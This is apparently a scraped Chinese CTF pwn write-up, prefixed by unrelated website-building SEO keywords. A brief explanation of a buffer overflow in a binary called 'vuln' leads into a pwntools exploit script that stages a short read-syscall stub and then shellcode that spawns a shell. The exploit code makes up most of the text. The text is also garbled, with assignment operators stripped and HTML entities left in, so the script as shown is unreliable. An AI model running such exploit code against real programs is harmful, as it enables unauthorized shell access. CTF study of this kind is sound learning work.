免费企业网站模板,网站如何防注册机,临安营销型网站建设,c2c商城网站建设公司1.vuln 这是主函数#xff0c;数一下就发现可以溢出最后的0x4008d0 然后会执行到这里#xff0c;逻辑就是在v0上写shellcode#xff0c;不过执行写0x10#xff0c;不够sh#xff0c;很明显要先read。
以下是exp:
from pwn import *
context.archamd64
ioprocess(./vuln)…1.vuln 这是主函数数一下就发现可以溢出最后的0x4008d0 然后会执行到这里逻辑就是在v0上写shellcode不过执行写0x10不够sh很明显要先read。
以下是exp:
from pwn import *
context.archamd64
ioprocess(./vuln)
io.recvuntil(binput name:\n)
io.sendline(ba*39)
#gdb.attach(io)
#pause()
io.recv()
shellxor rdi,rdi;lea rsi,[rdx0x9];syscall;
print(len(asm(shell)))
io.sendline(asm(shell))
#gdb.attach(io)
#pause()
io.sendline(asm(shellcraft.sh()))
io.interactive()